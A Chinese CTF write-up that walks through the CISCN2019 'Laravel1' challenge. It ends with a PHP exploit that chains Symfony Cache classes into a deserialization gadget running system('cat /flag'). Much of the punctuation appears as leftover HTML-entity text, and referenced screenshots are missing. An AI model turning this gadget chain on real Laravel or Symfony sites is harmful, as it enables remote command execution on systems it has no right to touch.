开发笔记:[CISCN2019总决赛Day1Web4]Laravel1

[CISCN2019 总决赛 Day1 Web4]Laravel1

界面如上&＃xff0c;比较单一&＃xff1a;

指出了反序列化的点&＃xff1a;还有备份文件。

下面反序列化的入口&＃xff1a;
就当找到了吧&＃xff1a;
确实可以跳转&＃xff1a;
可控&＃xff1a;
寻找这个类&＃xff0c;看是否被调用&＃xff1a;

开始寻找使用了saveDeferred类的&＃xff1a;

看别人的WP这个是唯一可以使用的:

调用了本类的initialise方法&＃xff0c;但前文并没有定义&＃xff0c;据其他WP说是会去父类找,

偷一张其继承关系的图&＃xff1a;
查询得到其主要父类&＃xff0c;尝试全局搜索initialise()

include可以使用&＃xff1a;
那么在之前的那个phpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来&＃xff1a;

贴exp:

namespace Symfony\\Component\\Cache\\Adapter;
class TagAwareAdapter{
public $deferred &＃61; array();
function __construct($x){
$this->pool &＃61; $x;
}
}
class ProxyAdapter{
protected $setInnerItem &＃61; &＃39;system&＃39;;
}
namespace Symfony\\Component\\Cache;
class CacheItem{
protected $innerItem &＃61; &＃39;cat /flag&＃39;;
}
$a &＃61; new \\Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter(new \\Symfony\\Component\\Cache\\Adapter\\ProxyAdapter());
$a->deferred &＃61; array(&＃39;aa&＃39;&＃61;>new \\Symfony\\Component\\Cache\\CacheItem);
echo urlencode(serialize($a));


使用&＃xff1a;

还有问题未解决&＃xff0c;等待了解&＃xff1a;理解的太浅显了&＃xff1a;